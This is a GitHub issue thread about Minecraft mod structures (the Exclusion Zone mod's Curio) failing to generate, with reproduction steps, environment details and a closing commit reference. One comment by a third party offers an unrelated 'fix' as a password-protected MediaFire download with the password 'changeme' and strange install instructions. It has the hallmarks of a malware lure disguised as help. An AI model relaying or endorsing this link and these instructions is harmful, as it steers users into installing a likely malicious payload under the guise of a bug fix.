### ISSUE TITLE
Structures do not generate whatsoever

### ISSUE THREAD

**Issue by kd8lvt** [kd8lvt/exclusionzone#5]
**Describe the bug**
Structures silently fail to generate in all scenarios

**To Reproduce**
1. Create a new world
2. /locate structure exclusionzone:curio
3. Teleport to the indicated location
4. No structure  
Alternatively:
1. Create or load a world
2. /place structure exclusionzone:curio
3. No structure

**Expected behavior**
The three variants of the Curio structure to generate randomly throughout the world, and manually via /place

**Screenshots**
Can't take a picture of nothing, unfortunately.

**I can't help you without logs! :**
I'd put logs here usually, for the sake of posterity, but the error is completely silent so why bother.

**Environment Details (please complete the following prompts):**
 - OS: Windows 11
 - Mod List Link: Just EZ and F-API.
 - Exclusion Zone Version: 1.0.3b-1.21
 - Minecraft Version: 1.21
 - Fabric Loader Version: 0.16.3
 - Fabric API Version: 0.102.0+1.21

**Additional context**
N/A

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kd8lvt** [comment]
Closed by [e2dd97a](https://github.com/kd8lvt/exclusionzone/commit/e2dd97acdc12f5cf9030c1fedee9e54ef1f877b0)
